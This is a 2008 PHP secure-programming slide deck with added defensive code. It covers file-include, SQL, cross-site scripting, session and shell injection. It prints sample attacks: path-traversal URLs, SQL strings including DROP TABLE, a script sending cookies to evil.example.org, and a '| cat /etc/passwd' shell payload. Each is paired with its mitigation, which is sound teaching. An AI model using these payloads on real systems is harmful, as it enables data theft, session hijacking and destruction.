PHP Secure Programming
The Most Secure Computer in the World
No need to secure the OS
No need to secure the software
No need to do anything; it is naturally secure
Even no need to switch it on
Web Security? PHP?
Fact 1: PHP is mainly used for web programs
Fact 2: Easy to learn
Fact 3: PHP runs on 20,917,850 domains and 1,224,183 IP addresses
Fact 4: More flexible functions
A Few Named Threats
Code Injection
SQL Injection
Cross-Site Scripting (XSS)
Session Hijacking
Session Fixation
Temp Files Abuse
Remote Execution
...and more and more unnamed threats
Code Injection

Don't pass user-supplied filenames straight to the filesystem:

$filename = $_REQUEST['message'];
$message = file_get_contents($filename);
print $message;

This is OK: http://example.com/myscript.php?message=hello.txt
But what if I do this?
http://example.com/myscript.php?message=passwords.txt
The script prints any file the web server process can read, including files that were never meant to be served.
This matters even more for include, require and require_once, because the file is not just read but executed as PHP:

$module = $_REQUEST['module'];
include("lib/$module");

This is OK: http://example.com/cms?module=login.php
But what if I do this?
http://example.com/cms?module=../passwords.ini
The "../" walks out of lib/, so the contents of passwords.ini end up in the response; and if the attacker can get a file of their own onto the server (an upload, for instance), the same include runs their code.
Code Injection Defense

Make sure the value is one you expected; if not... ERROR!

$requestedModule = $_REQUEST['module'];
switch ($requestedModule) {
    case "login":
        $module = "login";
        break;
    case "logout":
        $module = "logout";
        break;
    default:
        $module = "error";
}
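The same idea carried through both examples from the previous slides, as an added example that is not part of the original deck: the module name is only ever a key into a fixed table, and the message file is confined to one directory with basename() plus a realpath() check. The directory names, the module list and the read_message() helper are assumptions for illustration.

```php
<?php
// Added example (not from the original slides). Directory names, the module
// table and the read_message() helper are assumptions for illustration.

// Allowlist: the request value is only a key; it never becomes part of a path.
$modules   = array('login' => 'login.php', 'logout' => 'logout.php');
$requested = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
$module    = isset($modules[$requested]) ? $modules[$requested] : 'error.php';
include __DIR__ . '/lib/' . $module;   // only one of three known files can ever be included

// Reading a user-named file: drop directory components, resolve the path, and
// verify the result is still inside the messages directory.
function read_message($name, $dir)
{
    $base = realpath($dir);
    $path = realpath($dir . '/' . basename($name));   // basename() removes any "../" prefix
    if ($base === false || $path === false) {
        return false;                                 // directory or file does not exist
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;                                 // resolved outside $dir (e.g. via a symlink)
    }
    if (pathinfo($path, PATHINFO_EXTENSION) !== 'txt') {
        return false;                                 // only .txt messages are served
    }
    return file_get_contents($path);
}

$requestedMessage = isset($_REQUEST['message']) ? $_REQUEST['message'] : '';
$message = read_message($requestedMessage, __DIR__ . '/messages');
if ($message === false) {
    header('HTTP/1.1 400 Bad Request');
    exit('ERROR');
}
header('Content-Type: text/plain; charset=UTF-8');
print $message;
```

With this in place, ?message=../passwords.ini is reduced to passwords.ini inside messages/, and is then refused because it is not a .txt file; ?module=../passwords.ini is not a key in $modules and falls through to error.php.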
SQL Injection

A form for user search...

$username = $_POST['username'];
$query = "SELECT * FROM users WHERE name = '" . $username . "';";

If I give $username the value  a' or 't'='t
the query becomes
SELECT * FROM users WHERE name = 'a' or 't'='t';
which is true for every row, so every user is returned.

If I give $username the value  a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%
the query becomes
SELECT * FROM users WHERE name = 'a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';
(Whether the second and third statements actually run depends on the driver: mysql_query() sends one statement at a time and rejects this, while mysqli_multi_query() and some other database layers execute all of them.)
SQL Injection Defense

Quote every string value in the query, e.g. "SELECT * FROM users WHERE user = '" . $username . "'". Quoting alone is not a defense, though: the quote is exactly what the payloads above break out of.
Check the types of user-submitted values: is_bool(), is_float(), is_numeric(), is_string(), is_int(), intval(), settype(), strlen()
e.g. strpos($query, ';')
Escape every questionable character in the values that go into the query: ' " , ; ( ) and so on. Searching for keywords such as "FROM", "LIKE" and "WHERE" is a blacklist and is easily bypassed; escaping the value with the database's own function is what actually helps:
mysql_real_escape_string()
magic_quotes_gpc (default: on; deprecated in PHP 5.3 and removed in PHP 5.4, so do not rely on it)
If it is off, use addslashes() (or, better, the escaping function of your database)
If it is on and you don't need the slashes, strip them once at the start of the script. A plain array_map() does not descend into nested arrays such as foo[]=x, so use a recursive helper:

function strip_magic_quotes($value)
{
    return is_array($value) ? array_map('strip_magic_quotes', $value) : stripslashes($value);
}
if (get_magic_quotes_gpc()) {
    $_GET    = strip_magic_quotes($_GET);
    $_POST   = strip_magic_quotes($_POST);
    $_COOKIE = strip_magic_quotes($_COOKIE);
}
SQL Injection Defense

MySQL Improved Extension (mysqli): prepared statements

$stmt = mysqli_prepare($connection, "SELECT * FROM user WHERE user = ?");
mysqli_stmt_bind_param($stmt, "s", $username);
mysqli_stmt_execute($stmt);

Type characters for bind_param: s = string, i = integer, d = double, b = blob (binary)
($connection is the mysqli link returned by mysqli_connect(), not a connection string.)

PEAR DB and DB_DataObject also offer placeholders.
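A complete version of the mysqli lookup, as an added example that is not part of the original deck: the SQL text is fixed at prepare time, the user value travels separately, and the result rows are fetched back. It also shows the one case a placeholder does not cover by itself, a LIKE pattern, where % and _ inside the bound value are still wildcards. The host, credentials, table layout and the find_user()/search_users() helpers are assumptions for illustration.

```php
<?php
// Added example (not from the original slides). Host, credentials, table layout
// and the helper names are assumptions for illustration.
$db = new mysqli('localhost', 'app', 'secret', 'shop');
if ($db->connect_error) {
    exit('database unavailable');
}
$db->set_charset('utf8');   // binding and escaping must agree with the connection charset

// Exact match: the statement text never changes, so the value cannot alter the query.
function find_user(mysqli $db, $username)
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = ?');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $username);   // s = string, i = integer, d = double, b = blob
    $stmt->execute();
    $stmt->bind_result($id, $name);
    $rows = array();
    while ($stmt->fetch()) {
        $rows[] = array('id' => $id, 'name' => $name);
    }
    $stmt->close();
    return $rows;
}

// LIKE search: the placeholder stops injection, but % and _ inside the bound value
// are still wildcards, so escape them (MySQL's default escape character is backslash)
// unless the user is meant to be able to match everything.
function search_users(mysqli $db, $fragment)
{
    $fragment = addcslashes($fragment, '%_\\');
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name LIKE ? LIMIT 50');
    if ($stmt === false) {
        return false;
    }
    $pattern = '%' . $fragment . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $stmt->bind_result($id, $name);
    $rows = array();
    while ($stmt->fetch()) {
        $rows[] = array('id' => $id, 'name' => $name);
    }
    $stmt->close();
    return $rows;
}

// The payload from the previous slide is now just an odd name that matches no row.
$rows = find_user($db, "a' or 't'='t");
echo count($rows), " row(s) for the injection payload\n";

// A search for "%" returns only names that contain a literal percent sign.
$rows = search_users($db, '%');
echo count($rows), " row(s) containing a literal %\n";
```

bind_param() takes its arguments by reference, which is why the LIKE pattern is built in a variable first instead of being passed inline.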
XSS: Cross-Site Scripting

1.) The attacker inserts a script into a page other users will see:
<script>document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie</script>
2.) The victim logs in
3.) The server sets the victim's cookies
4.) The victim's browser renders the page and executes the script
5.) The script sends the cookies to the attacker, who steals the session

What XSS gives the attacker: remote control of the client browser
Reveal the value of a cookie
Change links on the page
Redirect to another URI
Render a bogus form
or any other undesirable action...
XSS Defense

Encode HTML entities in all non-HTML output: htmlentities()
e.g.
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
Output: A 'quote' is &lt;b&gt;bold&lt;/b&gt;
(With the default flags the single quote is left alone; pass ENT_QUOTES, and the page's charset, whenever the value lands inside a quoted attribute.)

Check user-supplied image URIs (avatar, icon) with parse_url(). A "picture" like
<img src="http://shopping.example.com/addCart.php?item=123"/>
makes every visitor's browser issue that request, with their own cookies, to your shop.

Show the domain name for user-submitted links
e.g. not safe: Hey, click this to see my photo <a href="http://badguys.net">Bala</a>
safe: Hey, click this to see my photo [badguys.net] Bala
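The three defenses on this slide as small helpers, added here as an example and not part of the original deck: an encoder that also covers single quotes, a link renderer that shows the real host next to the link text and refuses non-http(s) schemes, and an avatar check that only accepts images from hosts you expect. The function names e(), safe_link() and safe_avatar() and the allowed host list are assumptions for illustration; the inputs at the bottom are constructed in the shape of the slide's examples.

```php
<?php
// Added example (not from the original slides). Helper names and the allowed
// host list are assumptions for illustration.

// Encode for an HTML text node or attribute value. ENT_QUOTES also encodes the
// single quote, which the htmlentities() default (ENT_COMPAT) leaves alone; that
// matters inside single-quoted attributes. Always pass the charset the page uses.
function e($s)
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Render a user-submitted link so the reader sees where it really goes:
// only http/https is accepted, and the host is shown next to the link text.
function safe_link($url, $text)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return e($text);                       // not a usable absolute URL: text only
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return e($text);                       // rejects javascript:, data:, vbscript:, ...
    }
    return '<a href="' . e($url) . '" rel="nofollow">' . e($text) . '</a>'
         . ' [' . e($parts['host']) . ']';
}

// Same check for a user-supplied avatar URL, plus a host allowlist, so it can
// never point at a state-changing URL such as addCart.php on our own shop.
function safe_avatar($url, array $allowed_hosts)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return '';
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return '';
    }
    if (!in_array(strtolower($parts['host']), $allowed_hosts, true)) {
        return '';                             // e.g. shopping.example.com is refused
    }
    return '<img src="' . e($url) . '" alt="">';
}

// Constructed inputs in the shape of the slide's examples:
echo e("A 'quote' is <b>bold</b>"), "\n";
echo safe_link('http://badguys.net', 'Bala'), "\n";
echo safe_link('javascript:alert(1)', 'photo'), "\n";
echo safe_avatar('http://shopping.example.com/addCart.php?item=123',
                 array('images.example.com')), "\n";
```

htmlspecialchars() is enough here because the page is served as UTF-8; htmlentities() additionally converts every character that has a named entity, which is harmless but unnecessary once the charset is declared.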
Session Hijacking

What is a Session ID?

[Diagram: the victim's browser and the web server share Session ID AD238723FD32. The attacker obtains that same Session ID and presents it to the web server, which cannot tell the two clients apart.]

How the ID leaks: network eavesdropping (a network card in promiscuous mode)
If intranet: use a switch rather than a hub (a switch only raises the bar; ARP spoofing can still redirect traffic to the attacker)
If WiFi: WEP (Wired Equivalent Privacy) was the original answer, but it is cryptographically broken and its keys are recovered in minutes, so use WPA2
If Internet: SSL
Unwitting Exposure

Sending links: "See this item http://store.com/items.php?item=0987"
That is OK, but not if I send it like this:
http://store.com/items.php?item=0987&PHPSESSID=34223
Anyone who receives that link now has my session.

How to avoid it?
session.use_trans_sid (off by default; keep it off so PHP never rewrites the session ID into URLs)
session.use_only_cookies (defaults to 1, enabled, since PHP 5.3.0; set it yourself on older versions)
Session Fixation

1.) The attacker sends the victim a link: "See this link http://unsafesite?SID=3423"
2.) The victim clicks http://unsafesite?SID=3423
3.) The site shows its login page and adopts the ID from the URL, e.g. with session_id($_GET['SID']), so the victim's session is now 3423
4.) The victim logs in. The attacker, who chose the ID, now has full access with http://unsafesite?SID=3423
Session Hijacking Defense

Use SSL.
Use cookies instead of $_GET variables:
ini_set('session.use_only_cookies', TRUE);
ini_set('session.use_trans_sid', FALSE);
Use session timeouts:
ini_set('session.cookie_lifetime', 1200);
ini_set('session.gc_maxlifetime', $seconds);   // server-side expiry of idle sessions
Regenerate IDs for users whose status changes (e.g. after login): session_regenerate_id(true)
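The defenses from this slide and the fixation scenario before it put together in one login/logout handler, as an added example that is not part of the original deck. It sets the cookie-only and timeout options, adds an explicit idle check because gc_maxlifetime is only enforced when the garbage collector happens to run, and regenerates the ID at the moment the user's status changes. The user store, the authenticate() function and the 20-minute limit are assumptions for illustration; the Secure flag assumes the site is served over HTTPS.

```php
<?php
// Added example (not from the original slides). The user store, authenticate()
// and the 20-minute limit are assumptions; cookie_secure assumes HTTPS.

// Never accept a session ID from the URL, and mark the cookie so it is neither
// sent over plain HTTP nor readable by script (HttpOnly needs PHP >= 5.2).
ini_set('session.use_only_cookies', 1);
ini_set('session.use_trans_sid', 0);
ini_set('session.cookie_secure', 1);
ini_set('session.cookie_httponly', 1);
ini_set('session.cookie_lifetime', 1200);   // 20 minutes, as on the slide
ini_set('session.gc_maxlifetime', 1200);    // server-side expiry of idle session data
session_start();

// Constructed user store for the example; a real application would query its database.
$USERS = array('bala' => password_hash('correct horse', PASSWORD_DEFAULT));
function authenticate($username, $password)
{
    global $USERS;
    return isset($USERS[$username]) && password_verify($password, $USERS[$username]);
}

// gc_maxlifetime is enforced only when the garbage collector runs (by default on a
// small fraction of requests), so also check idle time explicitly on every request.
function expire_idle_session($max_idle)
{
    if (isset($_SESSION['last_seen']) && time() - $_SESSION['last_seen'] > $max_idle) {
        $_SESSION = array();
        session_destroy();
        session_start();
    }
    $_SESSION['last_seen'] = time();
}
expire_idle_session(1200);

// Status change (anonymous -> logged in) gets a fresh ID, so an ID planted by an
// attacker before login (fixation) never becomes the authenticated session.
function login_user($username, $password)
{
    if (!authenticate($username, $password)) {
        return false;
    }
    session_regenerate_id(true);   // true: delete the old session data as well
    $_SESSION['user'] = $username;
    $_SESSION['logged_in_at'] = time();
    return true;
}

// Logout: drop the data, the server-side session and the cookie together.
function logout_user()
{
    $_SESSION = array();
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000,
              $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}

// Constructed request for the example:
if (login_user('bala', 'correct horse')) {
    echo 'logged in as ', htmlspecialchars($_SESSION['user'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

Because use_only_cookies is set, a URL such as http://unsafesite?SID=3423 is ignored entirely; and even on a site that did call session_id() on user input, the session_regenerate_id(true) at login would leave the attacker holding an ID that is no longer authenticated.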
Remote Execution

Injection of shell commands:

<?php
$filename = $_GET['filename'];
$command = "/usr/bin/wc $filename";
$words = shell_exec($command);
print "$filename contains $words words.";
?>

This is OK: wordcount.php?filename=textfile.txt
But what if I give it this?
wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
(the filename decodes to: /dev/null | cat /etc/passwd )
The shell runs: /usr/bin/wc /dev/null | cat /etc/passwd
and the response contains the system's password file.
Remote Execution Defense

Allow only trusted, human users to import code
Store uploads outside of the web document root
Limit the allowable filename extensions for uploads
Use the disable_functions directive, e.g.
disable_functions = "phpinfo,shell_exec,system,passthru"
(eval is a language construct, not a function, so listing it here has no effect.)
Do not include PHP scripts from remote servers, e.g.
<?php include('http://example.net/code/common.php'); ?>
(keep allow_url_include off, which is its default)
Properly escape all shell commands: escapeshellarg(), escapeshellcmd()
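The word-count script hardened with escapeshellarg(), together with an upload handler that follows the slide's three upload rules, as an added example that is not part of the original deck. escapeshellarg() wraps the value in single quotes and escapes any embedded quote, so the whole user value reaches wc as one argument and "| cat /etc/passwd" is just part of a filename that does not exist. The directory names and the count_words()/store_upload() helpers are assumptions for illustration; the request at the bottom is constructed in the shape of the slide's attack URL.

```php
<?php
// Added example (not from the original slides). Directory names and helper
// names are assumptions for illustration.

// Count words in one file from a fixed directory. escapeshellarg() turns the user
// value into a single quoted argument, so shell metacharacters lose their meaning.
function count_words($filename, $dir)
{
    $base = realpath($dir);
    $path = realpath($dir . '/' . basename($filename));   // basename(): no directory parts
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;   // unknown file, or one outside $dir
    }
    $out = shell_exec('/usr/bin/wc -w ' . escapeshellarg($path));
    return $out === null ? false : (int) $out;
}

// Upload handling: allowlist the extension, never reuse the client-supplied name,
// and store the file outside the document root so it can never be requested as a script.
function store_upload(array $file, $dir)
{
    $allowed = array('txt', 'png', 'jpg', 'gif');
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false;   // "shell.php" is refused; "x.php.txt" is stored as .txt and never executed
    }
    // Random server-side name: the original name is untrusted and may contain anything.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return false;
    }
    return $name;   // the application stores this name; users never learn the real path
}

// Constructed request in the shape of the slide's attack URL:
$_GET['filename'] = '/dev/null | cat /etc/passwd';
$words = count_words($_GET['filename'], '/var/www/uploads');   // directory outside the web root
if ($words === false) {
    exit('ERROR');
}
print htmlspecialchars($_GET['filename'], ENT_QUOTES, 'UTF-8') . " contains $words words.";
```

Even without the realpath() containment, the command that would reach the shell is /usr/bin/wc -w '/dev/null | cat /etc/passwd', a single nonexistent path; with it, the request never reaches the shell at all. Prefer escapeshellarg() for individual arguments; escapeshellcmd() is for a whole command line and does not protect against an attacker adding extra arguments.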
Future? PHP 6.0 (as planned in 2008)

Register Globals: big security hole
Safe Mode: false sense of security
Magic Quotes: messed with the data
All three were slated for deprecation. (PHP 6.0 never shipped; the three were deprecated in PHP 5.3 and removed in PHP 5.4.)

Upcoming changes and features:
http://www.php.net/~derick/meetingnotes.html
http://www.phphacks.com/content/view/49/33/
Rasmus Lerdorf, PHP 6.0 wish list:
http://news.php.net/php.internals/17883
What to do?

Proper input validation
Don't do programming + security; do secure programming
Know the escaping function for each context: htmlentities(), mysql_real_escape_string(), parse_url(), addslashes(), escapeshellarg(), escapeshellcmd()... etc.
SSL
Use PEAR, PECL
Images from Flickr.com
reference: http://flickr.com/photos/opinicus/246099418/
remote_boy: http://flickr.com/photo_zoom.gne?id=331355695&size=l
level_cross: http://flickr.com/photo_zoom.gne?id=67342604&size=o
injection3: http://flickr.com/photos/fleurdelisa/249435636/
building game1: http://flickr.com/photo_zoom.gne?id=346575350&size=o
computer_baby1: http://flickr.com/photo_zoom.gne?id=102207751&size=o
country_border1: http://flickr.com/photo_zoom.gne?id=48740674&size=l
computer_baby: http://flickr.com/photo_zoom.gne?id=436594815&size=m
hijack: http://flickr.com/photo_zoom.gne?id=463129891&size=l
dog_security: http://flickr.com/photo_zoom.gne?id=2205272682&size=l
Id card: http://flickr.com/photo_zoom.gne?id=1269802640&size=o
References
Pro PHP Security, Chris Snyder and Michael Southwell
http://wikipedia.org/
http://www.sitepoint.com/article/phpsecurityblunders
http://phpsec.org/
http://www.google.com/
Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2
or any later version published by the Free Software Foundation.
http://www.gnu.org/copyleft/fdl.html